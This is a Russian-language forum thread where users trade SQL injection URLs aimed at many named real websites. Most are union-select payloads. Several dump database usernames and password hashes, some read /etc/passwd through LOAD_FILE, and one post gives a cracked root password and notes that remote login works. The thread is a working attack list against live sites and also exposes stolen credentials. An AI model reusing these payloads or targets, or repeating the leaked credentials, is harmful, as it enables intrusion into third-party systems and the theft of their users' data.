хоть столбцы бы подобрал Code: http://www.gelezo.net/files.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
=) ну так))) кстати http://www.rudtp.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* дальше не АСИЛИЛ
Sn@k3 там используется 2 запроса сразу. врятли можно что-то вытащить. попробуй здесь: http://www.rudtp.ru/download.php?id=-2+or+1=1/*
_http://www.uprava.org/section.php?id=225+union+select+1,2,3,4,5,6,0xc7ebfeeae020e1fbeb20e7e4e5f1fc203a29/*
_http://galagraphics.kz/portfolio.php?id=11+union+select+1,2,3,4,password,6,7,8,9,10+from+mysql.user/* хэш тут в SHA-1?
http://forum.vbios.com/ Сайт: http://forum.vbios.com/ Результат: выполнение SQL команд (нпр. получения пароля пользователя) Количество пользователей: 11013 URL: http://forum.vbios.com/addons/kit/serverinfo.php?id=-32+union+select+1,2,3,4,5,6,7,8,9,10,null,12,concat(U_LoginName,%22:%22,U_Password)+from+w3t_Users+where+U_Name=%22Arafat%22/* ====== Я сдесь не давно, кому помог не сочтите за сложность, поставьте +
Code: http://heraldry.com.ua/index.php3?lang=U&id=1344+union+select+0,0,0,VERSION(),0,0,0,0,0,0,0,0/* http://mobile.ru/news.php?news_id=-1+union+select+1,USER(),1,VERSION(),1,1,1,1+/* http://nikzdejoe.odessa.ua/?article=7425'+union+select+0,0,0/* http://www.gazeta.tv/news.php?id=192+union+select+0,0,0,0,0,0,0/* http://vipflat.kiev.ua/news/full_news.html?new_id=4148'+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
http://www.soaw.org/new/article.php?id=-2+or+1=1/* http://www.auditorium.ru/pers/person.php?id=-1+union+select+1,2,3,4-- [ http://www.rgups.ru/pages.php?id=-1+union+select+version()/* http://www.rgups.ru/pages.php?id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764)/* ] http://www.apahelpcenter.org/featuredtopics/feature.php?id=-2+or+1=@@version--
Сайты они видети ли разрабатывают Code: http://www.netservice.ru/portfolio_details.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Code: http://nemchenko.ru/main.php?id=-99+union+select+LOAD_FILE(0x2f6574632f706173737764)/* aka /etc/passwd^^ Code: http://nemchenko.ru/main.php?id=-99+union+select+concat(user,0x3a,password)+from+mysql.user/* :: root:5194866966b75566 aka root:1q2w3e Коннектиться можно удалённо...
http://www.rolemancer.ru/article.php?sid=-1+union+select+1,2,3,concat(uname,char(58),pass,char(58),email,char(58),user_icq,char(58),name),44,6,7,8,9,11111,11+from+users+limit+16,1/* http://www.forsleep.ru/index.php?rn_id=-1+union+select+1,version(),3,4,5,6,7/*
http://www.amic.ru/forum/?topic=980990+union+select+1,2,3,4,5,version(),7,8,9,10,11/*&page=55 Таблица user.
http://advancedcatalog.com.ru/modules.php?name=Web_Links&l_op=viewlink&cid=-1+union+select+1,2/*&min=600&orderby=hitsA&show=20 искал по экзамену.... вообщем в первой колонке реален вывод... http://www.ckn.ru/srochnoall.php?id=-1+union+select+1,2,3,4,5,6,7,8/* http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://rss2.ru/read.php?id=-99+union+select+1,convert(user+using+cp1251),convert(password+using+cp1251),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
http://www.atvmedia.ru/read.php?id=-99+union+select+1,2,3,4,user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/* root:3a27e90e7ddcbf0f root:a878 =\